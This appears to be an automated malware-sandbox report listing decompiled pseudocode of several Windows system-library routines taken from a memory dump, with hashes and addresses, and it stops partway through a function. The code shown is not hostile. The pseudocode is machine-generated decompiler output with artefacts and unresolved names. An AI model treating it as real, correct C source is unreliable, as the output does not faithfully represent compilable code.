Instruction ID: c0ecb2a06b4f4b9bf5c4bc0b3df35e0116a99f25c48c8d35c3ca889a2524a82a
Opcode Fuzzy Hash: e5020f5bc6040faed77fc6c52155a94f0ea665c0562d3412bf64e249d33332ca
Instruction Fuzzy Hash: 1C317A35601B048FD725CF28CC80B9BB3F5FB88714F18456DE5A68BA90EB35A801CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03416C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E03416C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E033B7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3487b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L033B4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E033DF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E033B7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E033D9AE0();
						_t23 = L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x03416c0a
0x03416c0f
0x03416c10
0x03416c13
0x03416c15
0x03416c19
0x03416c1c
0x03416c21
0x03416c28
0x03416c3a
0x03416c2a
0x03416c33
0x03416c33
0x03416c3f
0x03416c48
0x03416c4d
0x03416c60
0x03416c65
0x03416c69
0x03416c73
0x03416c79
0x03416c7f
0x03416c86
0x03416c90
0x03416c94
0x03416ca6
0x03416cb2
0x03416cbd
0x03416cbd
0x03416cc3
0x03416cc7
0x03416ccb
0x03416cd0
0x03416cd1
0x03416ce2
0x03416ce2
0x03416c69
0x03416ced

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c404c54e9884e8a3664e174eeed2ca23cf34acbdea6aed6d6bec248802815ad
Instruction ID: 05afdc01095d53f2cc0ad9669b07160d27a720be9d6950a7672bf0a9814b993e
Opcode Fuzzy Hash: 7c404c54e9884e8a3664e174eeed2ca23cf34acbdea6aed6d6bec248802815ad
Instruction Fuzzy Hash: 1021BF75A00A44AFC711DF68D980F6AB7B8FF48740F14006AF904DBB91E638ED10CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 033D90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E033D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E033ED4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E033CE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L033B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E033DF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E033CA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x033d90af
0x033d90b8
0x033d90bb
0x033d90bf
0x033d90c2
0x033d90c2
0x033d90c8
0x033d90cb
0x033d90cd
0x034114d7
0x034114eb
0x034114eb
0x00000000
0x034114eb
0x034114db
0x034114e6
0x00000000
0x034114f2
0x034114e8
0x00000000
0x034114e8
0x033d90d8
0x033d90da
0x033d90dd
0x033d90e5
0x00000000
0x033d9139
0x033d90fa
0x033d90fe
0x033d9142
0x00000000
0x033d9142
0x033d9104
0x033d9107
0x033d910b
0x033d9110
0x033d9118
0x033d9147
0x033d9148
0x033d914f
0x033d9150
0x033d9151
0x033d9152
0x033d9156
0x033d915d
0x033d9160
0x033d9168
0x033d916c
0x033d91bc
0x033d91be
0x00000000
0x033d91be
0x033d916e
0x033d9173
0x033d9176
0x00000000
0x00000000
0x033d917c
0x033d9180
0x033d91b5
0x00000000
0x033d91b5
0x033d9182
0x033d9185
0x033d9189
0x00000000
0x00000000
0x033d918e
0x033d9190
0x033d9198
0x00000000
0x00000000
0x033d91a0
0x00000000
0x033d91ad
0x033d91ad
0x033d91b0
0x033d91b1
0x00000000
0x033d9185
0x033d911a
0x033d911c
0x033d911f
0x033d9125
0x033d9127
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 6587d5b333defb2504c4b53273b6a0d6fbb4576318c25e0dedfc74958921b319
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 77218E76E00305EFDB20DF59D884BAAF7F8EB48710F14886AE949AB600D330ED50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 033C3B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E033C3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x34884c4; // 0x0
				_v12 = 1;
				_v8 =  *0x34884c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L033B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x34884c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E033DAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E033DFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x34884c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x34884c4; // 0x0
					L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x033c3b89
0x033c3b96
0x033c3ba1
0x033c3bab
0x033c3bb5
0x033c3bb9
0x03406298
0x033c3bbf
0x033c3bc2
0x033c3bc3
0x033c3bc9
0x033c3bca
0x033c3bcc
0x033c3bcd
0x033c3bd4
0x033c3bd6
0x033c3bdb
0x033c3bea
0x033c3bf7
0x033c3bfb
0x033c3bff
0x033c3c09
0x033c3c0a
0x033c3c0b
0x033c3c0f
0x033c3c14
0x033c3c18
0x033c3c18
0x033c3bfb
0x033c3c1b
0x033c3c30
0x033c3c30
0x033c3c3d

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70e4702d5bc0f11ddc3e051fcef397423036b71c3331883871072062b8fa4a2e
Instruction ID: 135495f4fa6061675b2e1e4be77671bd8d763b501cd8df6d7efcb9e85183ea3a
Opcode Fuzzy Hash: 70e4702d5bc0f11ddc3e051fcef397423036b71c3331883871072062b8fa4a2e
Instruction Fuzzy Hash: 62218E76A00218AFC700DF98DDC1B6EB7BDFB44718F154168E909AB251D375ED118B94

Uniqueness

Uniqueness Score: -1.00%

Function 03416CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E03416CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E033B7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E033B7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x3375c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E033CF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E033CF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E03417016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L033B2400( &_v52);
								}
								_t21 = L033B2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x03416cfb
0x03416d00
0x03416d02
0x03416d06
0x03416d0a
0x03416d0e
0x03416d19
0x03416d2b
0x03416d1b
0x03416d24
0x03416d24
0x03416d33
0x03416d39
0x03416d46
0x03416d4f
0x03416d61
0x03416d51
0x03416d5a
0x03416d5a
0x03416d69
0x03416d6b
0x03416d6d
0x03416d6f
0x03416d6f
0x03416d74
0x03416d79
0x03416d7a
0x03416d7f
0x03416d82
0x03416d88
0x03416d89
0x03416d90
0x03416d94
0x03416da7
0x03416db1
0x03416db1
0x03416dbb
0x03416dbb
0x03416d90
0x03416d69
0x03416d46
0x03416dc6

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d6d67fd8dc67a2ebabc3e11001cef2567288935c9e15e490192ca4e8fb2593
Instruction ID: e76b673ff6bed6c0825747721620801eee16c76c33b11d108261a6b34a3230fb
Opcode Fuzzy Hash: 52d6d67fd8dc67a2ebabc3e11001cef2567288935c9e15e490192ca4e8fb2593
Instruction Fuzzy Hash: 6621D072900B449BC311DF29C984BABB7ECEF82680F09095BBD40DF250E738D919C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 0346070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0346070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				void* _v11;
				signed int _v12;
				void* _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E034607DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0345AFDE( &_v8,  &_v12, 0x4000,  *_t9,  *_t7);
					E03461293(_t38, _v28, _t60);
					if(E033B7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E034514FB(_t38,  *_t21, _v8, _v12, 0xd);
					}
				}
				return  ~_t60;
			}

0x0346071b
0x03460724
0x03460734
0x03460738
0x0346074b
0x03460753
0x03460759
0x0346075d
0x03460779
0x0346077d
0x03460789
0x03460795
0x034607a7
0x03460797
0x034607a0
0x034607a0
0x034607af
0x034607c4
0x034607cd
0x034607cd
0x034607af
0x034607dc

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 6d87796396d18b195e2137fbd1f63a62b53c9ac5f6d25c483f5b7246e96d81ab
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: D421F23A608200AFD705DF18C880B6ABBA5EFC4350F08866EF9959F385D630DD09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03417794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E03417794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x3487b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L033B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E033DF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E033B7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E033D9AE0();
					_t24 = L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x03417799
0x0341779a
0x0341779b
0x034177a3
0x034177ab
0x034177ae
0x034177b1
0x034177b1
0x034177bf
0x034177c4
0x034177c8
0x034177ce
0x034177d4
0x034177e0
0x034177e0
0x034177d6
0x034177d6
0x034177de
0x00000000
0x00000000
0x034177de
0x034177e5
0x034177f0
0x034177f3
0x034177f6
0x034177fd
0x03417800
0x0341780c
0x03417818
0x0341782b
0x0341781a
0x03417823
0x03417823
0x03417830
0x03417831
0x03417838
0x0341783d
0x0341783e
0x0341784f
0x0341784f
0x0341785a

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48f34489eb93800e0fd42a9847e6dff0632794426503b8ffa698c604c9d74ede
Instruction ID: 8ecd6f7df91667b1b65755dee208de130a8924656b9fefe6f7698e28f325473b
Opcode Fuzzy Hash: 48f34489eb93800e0fd42a9847e6dff0632794426503b8ffa698c604c9d74ede
Instruction Fuzzy Hash: 7C21C676900A04AFC725DF69DC90EABBBB9EF48340F14056EF60ADB750D634E910CB98

Uniqueness

Uniqueness Score: -1.00%

Function 033BAE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E033BAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E033B7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E033B7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E033B7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E033B7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E03417794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x033bae78
0x033bae7c
0x033bae7e
0x033bae81
0x033bae86
0x033bae8d
0x03402691
0x033bae93
0x033bae93
0x033bae93
0x033bae98
0x033bae9d
0x034026a2
0x034026b4
0x034026a4
0x034026ad
0x034026ad
0x034026b9
0x00000000
0x034026bb
0x00000000
0x034026bb
0x033baea3
0x033baea3
0x033baea3
0x033baeaa
0x034026c0
0x034026c9
0x034026c9
0x033baeb3
0x034026d4
0x034026e1
0x00000000
0x00000000
0x034026e7
0x034026ee
0x034026f0
0x034026f9
0x034026f9
0x03402702
0x03402708
0x03402708
0x0340270b
0x0340270f
0x03402711
0x03402711
0x03402725
0x03402725
0x00000000
0x033baeb9
0x033baeb9
0x033baebf
0x033baebf
0x033baeb3

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: f019437a7febc753545c0682b1970bfdac75f9b31f23a2a0fa36de7d35e80407
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: 1721B031A01A809FD716DB69C988B6A77E8EF44290F1D08B1DE048FBE2D774DC40C794

Uniqueness

Uniqueness Score: -1.00%

Function 033CFD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E033CFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E033A76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L033B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x033cfd9b
0x033cfda0
0x033cfda1
0x033cfdab
0x033cfdad
0x033cfdb0
0x033cfdb8
0x033cfe0f
0x033cfde6
0x033cfde9
0x033cfdec
0x0340c0c0
0x033cfdfe
0x033cfe06
0x033cfe06
0x0340c0c8
0x033cfe2d
0x033cfe2d
0x00000000
0x033cfe2d
0x0340c0d1
0x0340c0e0
0x0340c0e5
0x0340c0e5
0x0340c0e8
0x00000000
0x0340c0e8
0x033cfdf4
0x00000000
0x00000000
0x033cfdf6
0x033cfdfa
0x033cfe1a
0x033cfe1f
0x033cfe1f
0x033cfdfc
0x00000000
0x033cfdfc
0x033cfdcc
0x033cfdd0
0x033cfe26
0x00000000
0x033cfe26
0x033cfdd8
0x033cfddb
0x033cfddd
0x033cfde0
0x00000000

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: b9b6b2581b33122fba6416a3f0dac1fde00bde5be3947f9af8ce7fa8cfa5d134
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: CA217F71A10681DBC731CF59C994A66F7FAEB94A10F24817EE9458BA25D730EC00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 033CB390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E033CB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E033B2280(_t12, 0x3488608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E033D00C2(0x3488608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L033B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x033cb395
0x033cb3a2
0x033cb3a5
0x033cb3aa
0x033cb3b2
0x033cb3ba
0x033cb3bd
0x033cb3c0
0x033cb3c4
0x033cb3c9
0x0340a3e9
0x0340a3ed
0x0340a3f0
0x0340a3ff
0x0340a403
0x0340a409
0x00000000
0x00000000
0x0340a40b
0x0340a40b
0x0340a40f
0x0340a415
0x0340a423
0x0340a423
0x0340a415
0x033cb3d1
0x033cb3e8
0x033cb3e8
0x033cb3d9

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffbaea41c429f0270d3e8c03c160331835e631b2d4d3da8445dbf31a2bad80b4
Instruction ID: c2906dd1014469b377a11f731773da1eccaeefb71e36bf84f304600261917272
Opcode Fuzzy Hash: ffbaea41c429f0270d3e8c03c160331835e631b2d4d3da8445dbf31a2bad80b4
Instruction Fuzzy Hash: BC114C377112145BCB28DE249DC1A6BB39AEBC5670B28013EDD16DF7D0CA315C02C798

Uniqueness

Uniqueness Score: -1.00%

Function 034146A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E034146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L033B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E033DF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
